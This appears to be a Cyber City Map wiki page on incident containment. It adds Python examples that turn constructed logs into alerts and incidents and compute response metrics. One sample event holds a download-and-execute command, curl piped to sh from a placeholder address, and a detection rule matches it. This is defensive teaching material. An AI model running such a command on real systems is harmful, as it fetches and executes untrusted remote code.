# Incident Containment
[[Incident Containment]] is a top-level [[Cybersecurity]] capability. At a minimum, every organization must be able to detect [[unauthorized access]] and restore affected systems and assets to a secure state after a compromise. Incident Containment is also the starting point for understanding how much risk an organization can accept while still meeting its compliance obligations: each risk the organization takes must be evaluated for its potential to result in unauthorized access, and the set of known risks that carry that potential is the basis for sizing response and containment capabilities. In organizations with significant adversary interest or a high risk appetite, Incident Containment is a critical capability and must be resourced to match the risks the organization plans to take. Reporting adversary abuse to hosting providers and other services used in an attack helps those organizations strengthen their own defenses as well. Ultimately, the faster an organization detects, contains, and restores, the better its outcome, and tracing each failure back to its cause is what turns individual incidents into continuous improvement of its cybersecurity.
## Map
``` mermaid <!-- element style="width:90%; height:auto" -->
graph TD
Top[[Cybersecurity]] --- E[[Incident Containment]]
E --- E.1[[Alert Correlation]]
E --- E.2[[Case Management]]
E --- E.3[[Incident Management]]
E --- E.4[[Forensic Analysis]]
E --- E.5[[Asset Restoration]]
E --- E.6[[Abuse Reporting]]
E --- E.7[[Failure Tracing]]
%% Class Definitions
%% =====================
class Top,A,A.1,A.2,A.3,A.4,A.5,A.6,B,B.1,B.2,B.3,B.4,B.5,C,C.1,C.2,C.3,C.4,D,D.1,D.2,D.3,D.4,D.5,E,E.1,E.2,E.3,E.4,E.5,E.6,E.7 internal-link,font-color:white;
class Top cssClassL0;
classDef cssClassL0 fill:black,stroke:black,stroke-width:4px,font-size:15px,font-color:white;
class A,B,C,D,E cssClassL1;
classDef cssClassL1 fill:darkblue,stroke:darkblue,stroke-width:4px,font-size:15px,font-color:white;
class A.2,A.3,A.4,A.5,A.6,B.1,B.2,B.3,B.4,B.5,C.1,C.2,C.3,C.4,D.1,D.2,D.3,D.4,D.5,E.1,E.2,E.3,E.4,E.5,E.6,E.7 cssClassL2;
classDef cssClassL2 fill:blue,stroke:blue,stroke-width:4px,font-size:15px,font-color:white;
class E cssClassCurrent;
classDef cssClassCurrent fill:#2f9503,stroke:#2f9503,stroke-width:4px,font-size:15px,font-color:white;
```
## Definition
> [!cm-definition] Definition
> **Incident Containment** is a set of capabilities implemented to detect and contain an incident so that assets can be restored to an appropriate level of securability post-compromise. Incident Containment includes all elements of discovery, handling, restoration, reporting, and failure tracing required to close the loop on restoring and improving the cybersecurity of the environment.
## Goals
>[!cm-goal] Goal 1
>**Rapid Detection** - Unauthorized access to a resource is easily detected and alerts are available for correlation and triage.
>[!cm-goal] Goal 2
>**Contain Incident** - Limit an adversary's ability to move laterally, or to pursue other asset weaknesses, from the unauthorized position they have already gained.
>[!cm-goal] Goal 3
>**Quick Restoration** - Assets can be restored to a secured state as quickly as possible when compromised.
>[!cm-goal] Goal 4
>**Traceability** - Any incident that can be traced to a known risk or vulnerability should be marked for reporting and for strategic remediation investment decisions during root cause analysis.
## Scope
The scope of Incident Containment covers all assets that have a defined defensive model from Control Development, that Control Verification has found still operating in a weakened state, that pose a risk to the organization's defined control posture, and that show evidence of abuse or anomalous behavior within the system.
## Process
```mermaid
flowchart LR
A1[Events <br /> as Input] --> B[1. Develop <br /> Alerts]
A2[Alerts <br /> as Input] --> C[2. Correlate <br /> Anomalies]
B --> C
C --> D1[3. Identify <br /> Cases]
D2[Receive <br /> Externally <br /> Reported <br /> Case] --> D1
D1 --> E[4. Identify <br /> Incidents]
E --> F1[5. Perform <br /> Forensic <br /> Analysis]
F1 --> F2[Leverage <br /> External <br /> Forensics]
F2 --> F1
F1 --> G[6. Restore <br /> Assets]
G --> F1
G --> H1[7. Report <br /> Abuse Externally]
H1 --> H2[Provide Disclosures]
H1 --> I[8. Trace Failure <br /> via Killchain]
I --> J[Share with <br /> Internal <br /> Stakeholders]
```
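Steps 1 through 4 and the kill-chain tracing of step 8, as an added worked example that is not part of the Cyber City Map page or its process definition: constructed authentication and process events are turned into alerts by three simple rules, alerts that share a host within a time window are correlated into a case, a case is promoted to an incident when its alerts span more than one kill-chain phase, and the observed phases are ordered along the chain so the first failed control is visible for failure tracing. The event format, the rules and thresholds, the rule-to-phase mapping, and the incident promotion criterion are all assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry for illustration (not real logs). Each row is
# an event as a SIEM might normalize it. Hosts, users and the 203.0.113.9
# address are documentation placeholders.
EVENTS = [
    {"ts": "2024-05-01T09:00:01", "host": "web01", "user": "svc_web", "type": "auth_fail", "detail": "ssh"},
    {"ts": "2024-05-01T09:00:03", "host": "web01", "user": "svc_web", "type": "auth_fail", "detail": "ssh"},
    {"ts": "2024-05-01T09:00:05", "host": "web01", "user": "svc_web", "type": "auth_fail", "detail": "ssh"},
    {"ts": "2024-05-01T09:00:07", "host": "web01", "user": "svc_web", "type": "auth_fail", "detail": "ssh"},
    {"ts": "2024-05-01T09:00:09", "host": "web01", "user": "svc_web", "type": "auth_fail", "detail": "ssh"},
    {"ts": "2024-05-01T09:00:12", "host": "web01", "user": "svc_web", "type": "auth_ok", "detail": "ssh"},
    {"ts": "2024-05-01T09:04:30", "host": "web01", "user": "svc_web", "type": "process", "detail": "curl http://203.0.113.9/x.sh | sh"},
    {"ts": "2024-05-01T09:06:10", "host": "web01", "user": "root", "type": "process", "detail": "ssh db01"},
    {"ts": "2024-05-01T11:30:00", "host": "hr02", "user": "alice", "type": "auth_fail", "detail": "vpn"},
    {"ts": "2024-05-01T11:30:20", "host": "hr02", "user": "alice", "type": "auth_ok", "detail": "vpn"},
]

# Lockheed Martin kill-chain phases, in order. The rule-to-phase mapping used
# in develop_alerts() is an assumption made for this example.
KILL_CHAIN = ["Reconnaissance", "Weaponization", "Delivery", "Exploitation",
              "Installation", "Command and Control", "Actions on Objectives"]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def develop_alerts(events, fail_threshold=5, success_window=timedelta(seconds=60)):
    """Step 1: turn raw events into alerts with three simple detection rules."""
    alerts = []
    by_actor = defaultdict(list)
    for e in events:
        by_actor[(e["host"], e["user"])].append(e)
    for (host, user), rows in by_actor.items():
        fails = [_ts(r) for r in rows if r["type"] == "auth_fail"]
        for r in rows:
            t = _ts(r)
            rule = phase = None
            if r["type"] == "auth_ok":
                # A success preceded by a burst of failures: credential brute force.
                recent = [f for f in fails if t - success_window <= f <= t]
                if len(recent) >= fail_threshold:
                    rule, phase = "brute_force_success", "Exploitation"
            elif r["type"] == "process" and "| sh" in r["detail"]:
                rule, phase = "download_and_execute", "Installation"
            elif r["type"] == "process" and r["detail"].startswith("ssh "):
                rule, phase = "lateral_ssh", "Actions on Objectives"
            if rule:
                alerts.append({"ts": t, "host": host, "user": user, "rule": rule, "phase": phase})
    return alerts


def correlate_cases(alerts, window=timedelta(minutes=30)):
    """Steps 2-3: alerts on the same host that fall within `window` of the
    previous alert form one case. Returns cases ordered by host."""
    cases = []
    for host in sorted({a["host"] for a in alerts}):
        current = None
        for a in sorted((x for x in alerts if x["host"] == host), key=lambda x: x["ts"]):
            if current is None or a["ts"] - current["alerts"][-1]["ts"] > window:
                current = {"host": host, "alerts": []}
                cases.append(current)
            current["alerts"].append(a)
    return cases


def identify_incidents(cases, min_phases=2):
    """Step 4: a case becomes an incident when its alerts span at least
    `min_phases` distinct kill-chain phases (assumed promotion criterion)."""
    return [c for c in cases if len({a["phase"] for a in c["alerts"]}) >= min_phases]


def trace_failure(incident):
    """Step 8: list the observed phases in time order; the earliest one on the
    kill chain is where the first control failed and where remediation starts."""
    seen = []
    for a in sorted(incident["alerts"], key=lambda x: x["ts"]):
        if a["phase"] not in seen:
            seen.append(a["phase"])
    return {"sequence": seen, "first_failed_phase": min(seen, key=KILL_CHAIN.index)}


if __name__ == "__main__":
    for inc in identify_incidents(correlate_cases(develop_alerts(EVENTS))):
        print(inc["host"], trace_failure(inc))
```

On the constructed events the single failed-then-successful VPN login on `hr02` never becomes an alert, the three alerts on `web01` collapse into one case, and that case is promoted to an incident whose earliest kill-chain phase is Exploitation, which is the control (credential brute-force resistance on SSH) that failure tracing would flag for investment.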
## Metrics
>[!cm-metric] Metric: [[% of Incident Response Capacity Utilized per Year]]
>[!cm-metric] Metric: [[Mean Time to Contain]]
>[!cm-metric] Metric: [[Mean Time to Contain a Predictable Incident]]
>[!cm-metric] Metric: [[Mean Time to Restore]]
>[!cm-metric] Metric: [[Trend of Predictable Incidents]]
>[!cm-metric] Metric: [[% of incidents past time to detect and time to respond thresholds]]
>[!cm-metric] Metric: [[% of Incidents vs. Total Events]]
>[!cm-metric] Metric: [[% of Alerts vs. Total Events]]
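The eight metrics above computed over a constructed incident ledger, as an added example that is not part of the Cyber City Map page; the linked metric pages define each metric authoritatively, so the working definitions used here are assumptions for illustration: time to contain is measured from detection to containment, time to restore from detection to restoration, time to detect from the earliest evidence found in forensics to detection, an incident is "predictable" when its root cause was traced to a risk already on the register, and capacity utilization is analyst hours booked against incidents over the hours budgeted for the year. The ledger, event and alert counts, capacity figure and thresholds are constructed data.

```python
from collections import Counter
from datetime import datetime
from statistics import mean

# Constructed incident ledger for illustration (not real data). Timestamps are
# ISO-8601. "first_evidence" is the earliest adversary activity found during
# forensics, "known_risk" the risk-register entry the root cause was traced to
# (None when the cause was not a previously accepted risk), "analyst_hours" the
# response effort booked against the incident.
INCIDENTS = [
    {"id": "INC-1", "first_evidence": "2024-04-01T20:00", "detected": "2024-04-02T08:00",
     "contained": "2024-04-02T10:00", "restored": "2024-04-02T18:00", "known_risk": "RISK-017", "analyst_hours": 40},
    {"id": "INC-2", "first_evidence": "2024-04-10T12:40", "detected": "2024-04-10T13:00",
     "contained": "2024-04-10T13:30", "restored": "2024-04-10T16:30", "known_risk": None, "analyst_hours": 8},
    {"id": "INC-3", "first_evidence": "2024-05-03T02:00", "detected": "2024-05-05T02:00",
     "contained": "2024-05-05T09:00", "restored": "2024-05-06T02:00", "known_risk": "RISK-017", "analyst_hours": 120},
    {"id": "INC-4", "first_evidence": "2024-06-20T10:00", "detected": "2024-06-20T11:00",
     "contained": "2024-06-20T11:45", "restored": "2024-06-20T14:45", "known_risk": "RISK-042", "analyst_hours": 12},
]
EVENT_COUNT = 1_250_000        # constructed: events ingested in the period
ALERT_COUNT = 3_400            # constructed: alerts raised from those events
ANNUAL_CAPACITY_HOURS = 2_000  # constructed: IR analyst hours budgeted per year


def _hours(start, end):
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 3600


def time_to_detect(inc):
    return _hours(inc["first_evidence"], inc["detected"])


def time_to_contain(inc):
    return _hours(inc["detected"], inc["contained"])


def time_to_restore(inc):
    return _hours(inc["detected"], inc["restored"])


def is_predictable(inc):
    return inc["known_risk"] is not None


def compute_metrics(incidents, event_count, alert_count, capacity_hours,
                    detect_threshold_h=24.0, respond_threshold_h=4.0):
    """Return the page's eight metrics for one reporting period. An incident is
    'past threshold' when either its time to detect or its time to contain
    exceeds the assumed threshold."""
    if not incidents:
        raise ValueError("no incidents in period")
    predictable = [i for i in incidents if is_predictable(i)]
    past_threshold = [i for i in incidents
                      if time_to_detect(i) > detect_threshold_h
                      or time_to_contain(i) > respond_threshold_h]
    return {
        "pct_capacity_utilized": 100.0 * sum(i["analyst_hours"] for i in incidents) / capacity_hours,
        "mean_time_to_contain_h": mean(time_to_contain(i) for i in incidents),
        "mean_time_to_contain_predictable_h": mean(time_to_contain(i) for i in predictable) if predictable else None,
        "mean_time_to_restore_h": mean(time_to_restore(i) for i in incidents),
        # Predictable incidents per month of detection: a rising count means
        # accepted risks keep being realized and deserve remediation investment.
        "predictable_trend": dict(sorted(Counter(i["detected"][:7] for i in predictable).items())),
        "pct_past_thresholds": 100.0 * len(past_threshold) / len(incidents),
        "pct_incidents_vs_events": 100.0 * len(incidents) / event_count,
        "pct_alerts_vs_events": 100.0 * alert_count / event_count,
    }


if __name__ == "__main__":
    for name, value in compute_metrics(INCIDENTS, EVENT_COUNT, ALERT_COUNT, ANNUAL_CAPACITY_HOURS).items():
        print(f"{name}: {value}")
```

Note that the mean time to contain a predictable incident (3.25 h on this ledger) is worse than the overall mean (about 2.6 h): two of the three predictable incidents trace to the same register entry, which is exactly the signal Goal 4 wants surfaced for a remediation investment decision.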
## Inspiration & Resources
+ [SP 800-61 Rev. 2, Computer Security Incident Handling Guide | CSRC (nist.gov)](https://csrc.nist.gov/pubs/sp/800/61/r2/final)
+ [Toolkit: Cybersecurity Incident Response Plan (gartner.com)](https://www.gartner.com/en/documents/4009176)
+ [FIRST - Improving Security Together](https://www.first.org/)
+ [Establishing a CSIRT (first.org)](https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf)
+ [Federal Government Cybersecurity Incident & Vulnerability Response Playbooks (cisa.gov)](https://www.cisa.gov/sites/default/files/2024-03/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf)
+ [Handbook for Computer Security Incident Response Teams (CSIRTs) (cmu.edu)](https://insights.sei.cmu.edu/documents/1606/2003_002_001_14102.pdf)
+ [ISO/IEC 27035-1:2023 - Information technology — Information security incident management — Part 1: Principles and process](https://www.iso.org/standard/78973.html)
+ [Good Practice Guide for Incident Management — ENISA (europa.eu)](https://www.enisa.europa.eu/publications/good-practice-guide-for-incident-management)
## Release Notes
+ [[Q2 2024 Release#Document L1 for Incident Containment]]
##
[Cyber City Map](https://cybercitymap.com/) © 2023-2024 by [ThirdScore, Inc.](https://thirdscore.com/) All Rights Reserved.